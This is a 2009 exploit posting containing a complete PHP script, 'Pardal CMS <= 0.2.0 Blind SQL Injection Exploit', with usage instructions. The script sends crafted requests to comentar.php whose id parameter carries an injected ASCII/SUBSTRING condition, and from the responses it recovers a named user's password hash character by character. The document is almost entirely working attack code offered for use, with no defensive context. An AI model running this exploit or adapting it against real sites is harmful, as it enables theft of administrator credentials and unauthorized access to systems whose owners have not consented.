pardalcms-sql.txt
Posted on 23 January 2009
--+++=============================================================+++-- --+++====== Pardal CMS <= 0.2.0 Blind SQL Injection Exploit ======+++-- --+++=============================================================+++-- <?php function usage () { echo " Pardal CMS <= 0.2.0 Blind SQL Injection Exploit". " [+] Author : darkjoker". " [+] Site : http://darkjoker.net23.net". " [+] Download: http://tinyurl.com/csg4vt". " [+] Usage : php xpl.php <hostname> <path> <username>". " [+] Ex. : php xpl.php localhost /PardalCMS Admin". " "; exit (); } function query ($user, $chr, $pos) { $query = "x' OR ASCII(SUBSTRING((SELECT senha FROM users WHERE login = '{$user}'),{$pos},1))='{$chr}"; $query = str_replace (" ", "%20", $query); $query = str_replace ("'", "%27", $query); return $query; } function exploit ($hostname, $path, $user, $pos, $chr) { $chr = ord ($chr); $fp = fsockopen ($hostname, 80); $query = query ($user, $chr, $pos); $request = "GET {$path}/comentar.php?id={$query} HTTP/1.1 ". "Host: {$hostname} ". "Connection: Close "; fputs ($fp, $request); while (!feof ($fp)) $reply .= fgets ($fp, 1024); fclose ($fp); if (preg_match ("/"#FFFFFF"> em </font>/", $reply)) return false; else return true; } if ($argc != 4) usage (); $hostname = $argv [1]; $path = $argv [2]; $username = $argv [3]; $key = "abcdef0123456789"; $pos = 1; $chr = 0; echo "[+] Password: "; while ($pos <= 32) { if (exploit ($hostname, $path, $username, $pos, $key [$chr])) { echo $key [$chr]; $chr = 0; $pos++; } else $chr++; } echo " "; ?>
